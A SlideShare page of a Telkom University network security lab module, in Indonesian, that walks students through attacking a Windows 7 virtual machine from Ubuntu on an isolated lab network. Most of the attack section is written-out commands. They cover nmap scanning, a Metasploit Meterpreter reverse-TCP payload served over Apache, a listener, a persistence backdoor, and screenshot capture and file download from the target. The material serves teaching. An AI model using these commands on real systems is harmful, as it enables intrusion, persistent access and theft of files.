SlideShare ist ein Scribd-Unternehmen logo
1 von 12
Downloaden Sie, um offline zu lesen
Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
JURNAL PRAKTIKUM
Skema Praktikum
Komputer Penyerang Komputer Target
Sistem Operasi
- Ubuntu 12.04
IP Address
- 192.168.1.2
Sistem Operasi
- Windows 7
IP Address
- 192.168.1.4
LANGKAH 1
Persiapkan komputer target
1. Ubah pengaturan jaringan Virtual box pada sistem operasi komputer target
Setting > jaringan > Adapter 1
Centang : Nyalakan Adapter Jaringan
Attached to : Jaringan Internal
1
Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
Klik mulai untuk menghidupkan mesin virtual komputer target
2. Non aktifkan firewall pada komputer target
Start > Control Panel > System and Security > Windows Firewall > Costumize Setting >
3. Aktifkan remote Desktop pada komputer target
Start > Control Panel > System and Security > System > Remote settings
2
Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
4. Setting IP address pada komputer target
Start > Control Panel > Network and Internet > Network and Sharing Center > Local Area
Connections > Properties >Internet Protocol Version 4 (TCP/IPv4)>Use the following IP address:
IP address : 192.168.1.4
Subnet mask : 255.255.255.0
Default gateway : 192.168.1.1
3
Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
LANGKAH 2
Persiapkan komputer penyerang
1. Ubah pengaturan jaringan Virtual box pada sistem operasi komputer target
Setting > jaringan > Adapter 1
Centang : Nyalakan Adapter Jaringan
Attached to : Jaringan Internal
4
Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
2. Klik mulai untuk menghidupkan mesin virtual komputer penyerang
5
Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
3. Masuk sebagai root
4. Setting IP static pada komputer penyerang melalui
Ubah isi file menjadi berikut :
Tekan ctrl + x lalu ketik y untuk menyimpan dan keluar dari editor
5. Restart networking untuk mendapatkan IP address yang telah dikonfigurasi
LANGKAH 3
Melakukan scanning dengan nmap
1. Lakukan foot printing untuk mendapatkan informasi sistem target
Output dari perintah diatas :
6
praktikum@praktikum:~$ sudo su
root@praktikum:~# nano /etc/network/interfaces
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet loopback
address 192.168.1.3
netmask 255.255.255.0
network 192.168.1.0
gateway 192.168.1.1
broadcast 192.168.1.255
root@praktikum:~# /etc/init.d/networking restart
root@praktikum:~# nmap –sS –O 192.168.1.1/24 192.168.1.255/24
Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
LANGKAH 4
Uji koneksi dari komputer penyerang ke komputer target :
Output dari perintah diatas :
7
root@praktikum:~$ ping 192.168.1.4
Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
LANGKAH 5
Pastikan apache2 dalam keadaan aktif
LANGKAH 6
Melakukan exploitasi dan instalasi backdoor dari komputer penyerang ke komputer target dengan
metasploit
1. Membuat payload di komputer penyerang untuk komputer target
Output dari perintah diatas:
2. Ketik msfconsole untuk memulai metasploit
3. Pilih payload yang sesuai dengan tujuan komputer target
4. setting payload yang tepat dari sesuai dengan tujuan exploitasi
5. Masukan IP komputer penyerang kedalam konfigurasi
Masukan port sesuai yang direncanakan pada pembuatan backdoor
8
root@praktikum:~#/etc/init.d/apache2 restart
msroot@praktikum:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD
windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.2
msf exploit(handler) > set LPORT 666
root@praktikum:~#msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.2 LPORT=666 x > /var/www/praktikum.exe
msfconsole
Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
6. Lakukan exploitasi
7. Menyimpan backdoor pada komputer target dengan membuka browser pada komputer target,
masukan URL: http://192.168.1.2/praktikum.exe
Klik run
Klik run
8. Sampai tahap ini, exploitasi sudah berhasil, kemudian kembali ke komputer penyerang untuk tahap
instalasi backdoor, baca informasi sistem komputer target
9
msf exploit(handler) > exploit
Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
Output dari perintah diatas:
9. Periksa IP Address pada komputer target
Output dari perintah diatas:
10
meterpreter > sysinfo
meterpreter > ifconfig
Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
10. Instalasi backdoor pada komputer penyerang terhadap komputer target
Catatan : 1037 adalah port yang terbuka tetapi belum digunakan
Output dari perintah diatas:
Baris terakhir menunjukan tempat penyimpanan backdoor dari komputer penyerang
11. Keluar dari aktifitas exploitasi
12. Lakukan eksploitasi kembali dengan menggunakan backdoor yang telah diinstal sebelumnya, dengan
mengganti port pada komputer penyerang sesuai port yang disetting sebelumnya yaitu port 1037.
13. Lakukan exploitasi
secara otomatis akan masuk ke payload meterpreter tanpa konfirmasi dari komputer target
14. Melihat perintah yang tersedia pada meterpreter
15. Lakukan screenshoot komputer target
buka hasil screenshoot diatas, berikut lokasi penyimpanan
16. Melihat posisi direktori saat ini
11
meterpreter >run persistence –U -i 5 –p 1037 –r 192.168.1.2
meterpreter > exit
msf exploit(handler) > set LPORT 1037
msf exploit(handler) > exploit
meterpreter > help
meterpreter > screenshot
meterpreter > pwd
Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
Outputnya
Jika ingin pindah ke direktori yang lain, contoh :
17. Download file pada komputer target
contoh :
Maka file akan tersimpan pada direktori dimana msfconsole dimulai
18. Lakukan restart mesin target
12
meterpreter > cd D:/
meterpreter > download namafile
meterpreter > reboot

Weitere ähnliche Inhalte

Was ist angesagt?

Security Measures
Security MeasuresSecurity Measures
Security Measures
hanna91
 

Was ist angesagt? (20)

Network Security 1st Lecture
Network Security 1st LectureNetwork Security 1st Lecture
Network Security 1st Lecture
 
Network Security
Network Security Network Security
Network Security
 
Snort
SnortSnort
Snort
 
Nmap Basics
Nmap BasicsNmap Basics
Nmap Basics
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & Metasploit
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With Metasploit
 
Penetration testing & Ethical Hacking
Penetration testing & Ethical HackingPenetration testing & Ethical Hacking
Penetration testing & Ethical Hacking
 
Snort
SnortSnort
Snort
 
CyberOps Associate Modul 22 Endpoint Protection
CyberOps Associate Modul 22 Endpoint ProtectionCyberOps Associate Modul 22 Endpoint Protection
CyberOps Associate Modul 22 Endpoint Protection
 
Nmap and metasploitable
Nmap and metasploitableNmap and metasploitable
Nmap and metasploitable
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
 
penetration testing
penetration testingpenetration testing
penetration testing
 
1.3 ancaman komputer
1.3 ancaman komputer1.3 ancaman komputer
1.3 ancaman komputer
 
Attacker's Perspective of Active Directory
Attacker's Perspective of Active DirectoryAttacker's Perspective of Active Directory
Attacker's Perspective of Active Directory
 
Nmap Hacking Guide
Nmap Hacking GuideNmap Hacking Guide
Nmap Hacking Guide
 
Firewalls and packet filters
Firewalls and packet filtersFirewalls and packet filters
Firewalls and packet filters
 
Firewalls
FirewallsFirewalls
Firewalls
 
Windows logging cheat sheet
Windows logging cheat sheetWindows logging cheat sheet
Windows logging cheat sheet
 
Setting up CSIRT
Setting up CSIRTSetting up CSIRT
Setting up CSIRT
 
Security Measures
Security MeasuresSecurity Measures
Security Measures
 

Andere mochten auch (10)

Jurnal modul 3 vpn
Jurnal modul 3   vpnJurnal modul 3   vpn
Jurnal modul 3 vpn
 
13. representasi data 1 julv1
13. representasi data 1 julv113. representasi data 1 julv1
13. representasi data 1 julv1
 
14. representasi data 2 jul
14. representasi data 2   jul14. representasi data 2   jul
14. representasi data 2 jul
 
4. alat input output jul
4. alat input output jul4. alat input output jul
4. alat input output jul
 
15. representasi data 3 jul
15. representasi data 3 jul15. representasi data 3 jul
15. representasi data 3 jul
 
16. representasi data 4
16. representasi data 4 16. representasi data 4
16. representasi data 4
 
17. representasi data 5 julv2
17. representasi data 5   julv217. representasi data 5   julv2
17. representasi data 5 julv2
 
2. central processing unit
2. central processing unit2. central processing unit
2. central processing unit
 
Modern Honey Network at Bay Area Open Source Security Hackers
Modern Honey Network at Bay Area Open Source Security HackersModern Honey Network at Bay Area Open Source Security Hackers
Modern Honey Network at Bay Area Open Source Security Hackers
 
Pengamanan Jaringan dengan Honeynet-Charles Lim
Pengamanan Jaringan dengan Honeynet-Charles LimPengamanan Jaringan dengan Honeynet-Charles Lim
Pengamanan Jaringan dengan Honeynet-Charles Lim
 

Ähnlich wie Jurnal metasploit(revisi)

Laporan 7 konfigurasi wireless lan
Laporan 7 konfigurasi wireless lanLaporan 7 konfigurasi wireless lan
Laporan 7 konfigurasi wireless lan
Willy Winas
 
Laporan resmi
Laporan resmiLaporan resmi
Laporan resmi
natubakha
 
Laporan keamanan data 1
Laporan keamanan data 1Laporan keamanan data 1
Laporan keamanan data 1
ramasatriaf
 
Martin Mematikan Komputer Jarak Jauh
Martin  Mematikan Komputer Jarak JauhMartin  Mematikan Komputer Jarak Jauh
Martin Mematikan Komputer Jarak Jauh
kresnokoro1945
 
Laporan praktikum modul 1
Laporan praktikum modul 1Laporan praktikum modul 1
Laporan praktikum modul 1
Devandy Enda
 
Modul pembahasan-soal-ukk-tkj-paket-3-2016-2017
Modul pembahasan-soal-ukk-tkj-paket-3-2016-2017Modul pembahasan-soal-ukk-tkj-paket-3-2016-2017
Modul pembahasan-soal-ukk-tkj-paket-3-2016-2017
Bunda Uffy
 

Ähnlich wie Jurnal metasploit(revisi) (20)

Laporan praktikum modul 8
Laporan praktikum modul 8Laporan praktikum modul 8
Laporan praktikum modul 8
 
Solusi Tugas Studi Kasus IPTables Three-Legged Network Firewall
Solusi Tugas Studi Kasus IPTables Three-Legged Network FirewallSolusi Tugas Studi Kasus IPTables Three-Legged Network Firewall
Solusi Tugas Studi Kasus IPTables Three-Legged Network Firewall
 
Laporan PIJK 8
Laporan PIJK 8Laporan PIJK 8
Laporan PIJK 8
 
Mikrotik MTCNA
Mikrotik MTCNAMikrotik MTCNA
Mikrotik MTCNA
 
Lapres 4 dan 5 1235010002
Lapres 4 dan 5   1235010002Lapres 4 dan 5   1235010002
Lapres 4 dan 5 1235010002
 
Laporan 7 konfigurasi wireless lan
Laporan 7 konfigurasi wireless lanLaporan 7 konfigurasi wireless lan
Laporan 7 konfigurasi wireless lan
 
Makalah jarkom
Makalah jarkomMakalah jarkom
Makalah jarkom
 
Firewall Mikrotik
Firewall MikrotikFirewall Mikrotik
Firewall Mikrotik
 
Tutorial mikrotik cindy
Tutorial mikrotik cindyTutorial mikrotik cindy
Tutorial mikrotik cindy
 
Laporan resmi
Laporan resmiLaporan resmi
Laporan resmi
 
Pengenalan mikrotik revisi
Pengenalan mikrotik revisiPengenalan mikrotik revisi
Pengenalan mikrotik revisi
 
9.1 gatewae server
9.1 gatewae server9.1 gatewae server
9.1 gatewae server
 
Lebih dalam dengan Telnet dan SSH
Lebih dalam dengan Telnet dan SSHLebih dalam dengan Telnet dan SSH
Lebih dalam dengan Telnet dan SSH
 
Cara konfigurasi mikrotik os sebagai network router
Cara konfigurasi mikrotik os sebagai network routerCara konfigurasi mikrotik os sebagai network router
Cara konfigurasi mikrotik os sebagai network router
 
TELNET
TELNETTELNET
TELNET
 
Laporan keamanan data 1
Laporan keamanan data 1Laporan keamanan data 1
Laporan keamanan data 1
 
Martin Mematikan Komputer Jarak Jauh
Martin  Mematikan Komputer Jarak JauhMartin  Mematikan Komputer Jarak Jauh
Martin Mematikan Komputer Jarak Jauh
 
Laporan praktikum modul 1
Laporan praktikum modul 1Laporan praktikum modul 1
Laporan praktikum modul 1
 
Nat & proxy server
Nat &  proxy serverNat &  proxy server
Nat & proxy server
 
Modul pembahasan-soal-ukk-tkj-paket-3-2016-2017
Modul pembahasan-soal-ukk-tkj-paket-3-2016-2017Modul pembahasan-soal-ukk-tkj-paket-3-2016-2017
Modul pembahasan-soal-ukk-tkj-paket-3-2016-2017
 

Mehr von Setia Juli Irzal Ismail

Mehr von Setia Juli Irzal Ismail (20)

slide-share.pdf
slide-share.pdfslide-share.pdf
slide-share.pdf
 
slide-lp3i-final.pdf
slide-lp3i-final.pdfslide-lp3i-final.pdf
slide-lp3i-final.pdf
 
society50-jul-share.pdf
society50-jul-share.pdfsociety50-jul-share.pdf
society50-jul-share.pdf
 
57 slide presentation
57 slide presentation57 slide presentation
57 slide presentation
 
Panduan Proyek Akhir D3 Teknologi Komputer Telkom University
Panduan Proyek Akhir D3 Teknologi Komputer Telkom UniversityPanduan Proyek Akhir D3 Teknologi Komputer Telkom University
Panduan Proyek Akhir D3 Teknologi Komputer Telkom University
 
Sosialisasi kurikulum2020
Sosialisasi kurikulum2020Sosialisasi kurikulum2020
Sosialisasi kurikulum2020
 
Welcoming maba 2020
Welcoming maba 2020Welcoming maba 2020
Welcoming maba 2020
 
Slide jul apcert agm 2016
Slide jul apcert agm 2016Slide jul apcert agm 2016
Slide jul apcert agm 2016
 
Tugas besar MK Keamanan Jaringan
Tugas besar MK Keamanan Jaringan Tugas besar MK Keamanan Jaringan
Tugas besar MK Keamanan Jaringan
 
04 sniffing
04 sniffing04 sniffing
04 sniffing
 
02 teknik penyerangan
02 teknik penyerangan02 teknik penyerangan
02 teknik penyerangan
 
01a pengenalan keamanan jaringan upload
01a pengenalan keamanan jaringan upload01a pengenalan keamanan jaringan upload
01a pengenalan keamanan jaringan upload
 
Kajian3 upload
Kajian3 uploadKajian3 upload
Kajian3 upload
 
1.pendahuluan sistem operasi
1.pendahuluan sistem operasi1.pendahuluan sistem operasi
1.pendahuluan sistem operasi
 
10 tk3193-ids
10 tk3193-ids10 tk3193-ids
10 tk3193-ids
 
09 vpn
09 vpn 09 vpn
09 vpn
 
17. representasi data 5 jul
17. representasi data 5   jul17. representasi data 5   jul
17. representasi data 5 jul
 
16. representasi data 4 jul
16. representasi data 4   jul16. representasi data 4   jul
16. representasi data 4 jul
 
15. representasi data 3 jul2
15. representasi data 3   jul215. representasi data 3   jul2
15. representasi data 3 jul2
 
Latihan6
Latihan6Latihan6
Latihan6
 

Kürzlich hochgeladen

ppt-akhlak-tercela-foya-foya-riya-sumah-takabur-hasad asli.ppt
ppt-akhlak-tercela-foya-foya-riya-sumah-takabur-hasad asli.pptppt-akhlak-tercela-foya-foya-riya-sumah-takabur-hasad asli.ppt
ppt-akhlak-tercela-foya-foya-riya-sumah-takabur-hasad asli.ppt
AgusRahmat39
 
Latsol TWK Nasionalisme untuk masuk CPNS
Latsol TWK Nasionalisme untuk masuk CPNSLatsol TWK Nasionalisme untuk masuk CPNS
Latsol TWK Nasionalisme untuk masuk CPNS
dheaprs
 
bab 6 ancaman terhadap negara dalam bingkai bhinneka tunggal ika
bab 6 ancaman terhadap negara dalam bingkai bhinneka tunggal ikabab 6 ancaman terhadap negara dalam bingkai bhinneka tunggal ika
bab 6 ancaman terhadap negara dalam bingkai bhinneka tunggal ika
AtiAnggiSupriyati
 
Bab 7 - Perilaku Ekonomi dan Kesejahteraan Sosial.pptx
Bab 7 - Perilaku Ekonomi dan Kesejahteraan Sosial.pptxBab 7 - Perilaku Ekonomi dan Kesejahteraan Sosial.pptx
Bab 7 - Perilaku Ekonomi dan Kesejahteraan Sosial.pptx
ssuser35630b
 

Kürzlich hochgeladen (20)

MODUL P5 KEWIRAUSAHAAN SMAN 2 SLAWI 2023.pptx
MODUL P5 KEWIRAUSAHAAN SMAN 2 SLAWI 2023.pptxMODUL P5 KEWIRAUSAHAAN SMAN 2 SLAWI 2023.pptx
MODUL P5 KEWIRAUSAHAAN SMAN 2 SLAWI 2023.pptx
 
(NEW) Template Presentasi UGM 2 (2).pptx
(NEW) Template Presentasi UGM 2 (2).pptx(NEW) Template Presentasi UGM 2 (2).pptx
(NEW) Template Presentasi UGM 2 (2).pptx
 
Hiperlipidemiaaaaaaaaaaaaaaaaaaaaaaaaaaa
HiperlipidemiaaaaaaaaaaaaaaaaaaaaaaaaaaaHiperlipidemiaaaaaaaaaaaaaaaaaaaaaaaaaaa
Hiperlipidemiaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
ppt-akhlak-tercela-foya-foya-riya-sumah-takabur-hasad asli.ppt
ppt-akhlak-tercela-foya-foya-riya-sumah-takabur-hasad asli.pptppt-akhlak-tercela-foya-foya-riya-sumah-takabur-hasad asli.ppt
ppt-akhlak-tercela-foya-foya-riya-sumah-takabur-hasad asli.ppt
 
Modul Ajar Bahasa Indonesia Kelas 4 Fase B
Modul Ajar Bahasa Indonesia Kelas 4 Fase BModul Ajar Bahasa Indonesia Kelas 4 Fase B
Modul Ajar Bahasa Indonesia Kelas 4 Fase B
 
Latsol TWK Nasionalisme untuk masuk CPNS
Latsol TWK Nasionalisme untuk masuk CPNSLatsol TWK Nasionalisme untuk masuk CPNS
Latsol TWK Nasionalisme untuk masuk CPNS
 
vIDEO kelayakan berita untuk mahasiswa.ppsx
vIDEO kelayakan berita untuk mahasiswa.ppsxvIDEO kelayakan berita untuk mahasiswa.ppsx
vIDEO kelayakan berita untuk mahasiswa.ppsx
 
Refleksi Mandiri Modul 1.3 - KANVAS BAGJA.pptx.pptx
Refleksi Mandiri Modul 1.3 - KANVAS BAGJA.pptx.pptxRefleksi Mandiri Modul 1.3 - KANVAS BAGJA.pptx.pptx
Refleksi Mandiri Modul 1.3 - KANVAS BAGJA.pptx.pptx
 
Contoh Laporan Observasi Pembelajaran Rekan Sejawat.pdf
Contoh Laporan Observasi Pembelajaran Rekan Sejawat.pdfContoh Laporan Observasi Pembelajaran Rekan Sejawat.pdf
Contoh Laporan Observasi Pembelajaran Rekan Sejawat.pdf
 
MAKALAH KELOMPOK 7 ADMINISTRASI LAYANAN KHUSUS.pdf
MAKALAH KELOMPOK 7 ADMINISTRASI LAYANAN KHUSUS.pdfMAKALAH KELOMPOK 7 ADMINISTRASI LAYANAN KHUSUS.pdf
MAKALAH KELOMPOK 7 ADMINISTRASI LAYANAN KHUSUS.pdf
 
Materi Sosiologi Kelas X Bab 1. Ragam Gejala Sosial dalam Masyarakat (Kurikul...
Materi Sosiologi Kelas X Bab 1. Ragam Gejala Sosial dalam Masyarakat (Kurikul...Materi Sosiologi Kelas X Bab 1. Ragam Gejala Sosial dalam Masyarakat (Kurikul...
Materi Sosiologi Kelas X Bab 1. Ragam Gejala Sosial dalam Masyarakat (Kurikul...
 
bab 6 ancaman terhadap negara dalam bingkai bhinneka tunggal ika
bab 6 ancaman terhadap negara dalam bingkai bhinneka tunggal ikabab 6 ancaman terhadap negara dalam bingkai bhinneka tunggal ika
bab 6 ancaman terhadap negara dalam bingkai bhinneka tunggal ika
 
Bab 7 - Perilaku Ekonomi dan Kesejahteraan Sosial.pptx
Bab 7 - Perilaku Ekonomi dan Kesejahteraan Sosial.pptxBab 7 - Perilaku Ekonomi dan Kesejahteraan Sosial.pptx
Bab 7 - Perilaku Ekonomi dan Kesejahteraan Sosial.pptx
 
Prakarsa Perubahan ATAP (Awal - Tantangan - Aksi - Perubahan)
Prakarsa Perubahan ATAP (Awal - Tantangan - Aksi - Perubahan)Prakarsa Perubahan ATAP (Awal - Tantangan - Aksi - Perubahan)
Prakarsa Perubahan ATAP (Awal - Tantangan - Aksi - Perubahan)
 
Salinan dari JUrnal Refleksi Mingguan modul 1.3.pdf
Salinan dari JUrnal Refleksi Mingguan modul 1.3.pdfSalinan dari JUrnal Refleksi Mingguan modul 1.3.pdf
Salinan dari JUrnal Refleksi Mingguan modul 1.3.pdf
 
presentasi lembaga negara yang ada di indonesia
presentasi lembaga negara yang ada di indonesiapresentasi lembaga negara yang ada di indonesia
presentasi lembaga negara yang ada di indonesia
 
Modul Ajar Pendidikan Pancasila Kelas 5 Fase C
Modul Ajar Pendidikan Pancasila Kelas 5 Fase CModul Ajar Pendidikan Pancasila Kelas 5 Fase C
Modul Ajar Pendidikan Pancasila Kelas 5 Fase C
 
PERAN PERAWAT DALAM PEMERIKSAAN PENUNJANG.pptx
PERAN PERAWAT DALAM PEMERIKSAAN PENUNJANG.pptxPERAN PERAWAT DALAM PEMERIKSAAN PENUNJANG.pptx
PERAN PERAWAT DALAM PEMERIKSAAN PENUNJANG.pptx
 
2 KISI-KISI Ujian Sekolah Dasar mata pelajaranPPKn 2024.pdf
2 KISI-KISI Ujian Sekolah Dasar  mata pelajaranPPKn 2024.pdf2 KISI-KISI Ujian Sekolah Dasar  mata pelajaranPPKn 2024.pdf
2 KISI-KISI Ujian Sekolah Dasar mata pelajaranPPKn 2024.pdf
 
PELAKSANAAN + Link-Link MATERI Training_ "Effective INVENTORY & WAREHOUSING...
PELAKSANAAN  + Link-Link MATERI Training_ "Effective INVENTORY &  WAREHOUSING...PELAKSANAAN  + Link-Link MATERI Training_ "Effective INVENTORY &  WAREHOUSING...
PELAKSANAAN + Link-Link MATERI Training_ "Effective INVENTORY & WAREHOUSING...
 

Jurnal metasploit(revisi)

  • 1. Modul Praktek Network Security Keamanan Jaringan Telkom University 2014-2015 JURNAL PRAKTIKUM Skema Praktikum Komputer Penyerang Komputer Target Sistem Operasi - Ubuntu 12.04 IP Address - 192.168.1.2 Sistem Operasi - Windows 7 IP Address - 192.168.1.4 LANGKAH 1 Persiapkan komputer target 1. Ubah pengaturan jaringan Virtual box pada sistem operasi komputer target Setting > jaringan > Adapter 1 Centang : Nyalakan Adapter Jaringan Attached to : Jaringan Internal 1
  • 2. Modul Praktek Network Security Keamanan Jaringan Telkom University 2014-2015 Klik mulai untuk menghidupkan mesin virtual komputer target 2. Non aktifkan firewall pada komputer target Start > Control Panel > System and Security > Windows Firewall > Costumize Setting > 3. Aktifkan remote Desktop pada komputer target Start > Control Panel > System and Security > System > Remote settings 2
  • 3. Modul Praktek Network Security Keamanan Jaringan Telkom University 2014-2015 4. Setting IP address pada komputer target Start > Control Panel > Network and Internet > Network and Sharing Center > Local Area Connections > Properties >Internet Protocol Version 4 (TCP/IPv4)>Use the following IP address: IP address : 192.168.1.4 Subnet mask : 255.255.255.0 Default gateway : 192.168.1.1 3
  • 4. Modul Praktek Network Security Keamanan Jaringan Telkom University 2014-2015 LANGKAH 2 Persiapkan komputer penyerang 1. Ubah pengaturan jaringan Virtual box pada sistem operasi komputer target Setting > jaringan > Adapter 1 Centang : Nyalakan Adapter Jaringan Attached to : Jaringan Internal 4
  • 5. Modul Praktek Network Security Keamanan Jaringan Telkom University 2014-2015 2. Klik mulai untuk menghidupkan mesin virtual komputer penyerang 5
  • 6. Modul Praktek Network Security Keamanan Jaringan Telkom University 2014-2015 3. Masuk sebagai root 4. Setting IP static pada komputer penyerang melalui Ubah isi file menjadi berikut : Tekan ctrl + x lalu ketik y untuk menyimpan dan keluar dari editor 5. Restart networking untuk mendapatkan IP address yang telah dikonfigurasi LANGKAH 3 Melakukan scanning dengan nmap 1. Lakukan foot printing untuk mendapatkan informasi sistem target Output dari perintah diatas : 6 praktikum@praktikum:~$ sudo su root@praktikum:~# nano /etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet loopback address 192.168.1.3 netmask 255.255.255.0 network 192.168.1.0 gateway 192.168.1.1 broadcast 192.168.1.255 root@praktikum:~# /etc/init.d/networking restart root@praktikum:~# nmap –sS –O 192.168.1.1/24 192.168.1.255/24
  • 7. Modul Praktek Network Security Keamanan Jaringan Telkom University 2014-2015 LANGKAH 4 Uji koneksi dari komputer penyerang ke komputer target : Output dari perintah diatas : 7 root@praktikum:~$ ping 192.168.1.4
  • 8. Modul Praktek Network Security Keamanan Jaringan Telkom University 2014-2015 LANGKAH 5 Pastikan apache2 dalam keadaan aktif LANGKAH 6 Melakukan exploitasi dan instalasi backdoor dari komputer penyerang ke komputer target dengan metasploit 1. Membuat payload di komputer penyerang untuk komputer target Output dari perintah diatas: 2. Ketik msfconsole untuk memulai metasploit 3. Pilih payload yang sesuai dengan tujuan komputer target 4. setting payload yang tepat dari sesuai dengan tujuan exploitasi 5. Masukan IP komputer penyerang kedalam konfigurasi Masukan port sesuai yang direncanakan pada pembuatan backdoor 8 root@praktikum:~#/etc/init.d/apache2 restart msroot@praktikum:~# msfconsole msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.2 msf exploit(handler) > set LPORT 666 root@praktikum:~#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=666 x > /var/www/praktikum.exe msfconsole
  • 9. Modul Praktek Network Security Keamanan Jaringan Telkom University 2014-2015 6. Lakukan exploitasi 7. Menyimpan backdoor pada komputer target dengan membuka browser pada komputer target, masukan URL: http://192.168.1.2/praktikum.exe Klik run Klik run 8. Sampai tahap ini, exploitasi sudah berhasil, kemudian kembali ke komputer penyerang untuk tahap instalasi backdoor, baca informasi sistem komputer target 9 msf exploit(handler) > exploit
  • 10. Modul Praktek Network Security Keamanan Jaringan Telkom University 2014-2015 Output dari perintah diatas: 9. Periksa IP Address pada komputer target Output dari perintah diatas: 10 meterpreter > sysinfo meterpreter > ifconfig
  • 11. Modul Praktek Network Security Keamanan Jaringan Telkom University 2014-2015 10. Instalasi backdoor pada komputer penyerang terhadap komputer target Catatan : 1037 adalah port yang terbuka tetapi belum digunakan Output dari perintah diatas: Baris terakhir menunjukan tempat penyimpanan backdoor dari komputer penyerang 11. Keluar dari aktifitas exploitasi 12. Lakukan eksploitasi kembali dengan menggunakan backdoor yang telah diinstal sebelumnya, dengan mengganti port pada komputer penyerang sesuai port yang disetting sebelumnya yaitu port 1037. 13. Lakukan exploitasi secara otomatis akan masuk ke payload meterpreter tanpa konfirmasi dari komputer target 14. Melihat perintah yang tersedia pada meterpreter 15. Lakukan screenshoot komputer target buka hasil screenshoot diatas, berikut lokasi penyimpanan 16. Melihat posisi direktori saat ini 11 meterpreter >run persistence –U -i 5 –p 1037 –r 192.168.1.2 meterpreter > exit msf exploit(handler) > set LPORT 1037 msf exploit(handler) > exploit meterpreter > help meterpreter > screenshot meterpreter > pwd
  • 12. Modul Praktek Network Security Keamanan Jaringan Telkom University 2014-2015 Outputnya Jika ingin pindah ke direktori yang lain, contoh : 17. Download file pada komputer target contoh : Maka file akan tersimpan pada direktori dimana msfconsole dimulai 18. Lakukan restart mesin target 12 meterpreter > cd D:/ meterpreter > download namafile meterpreter > reboot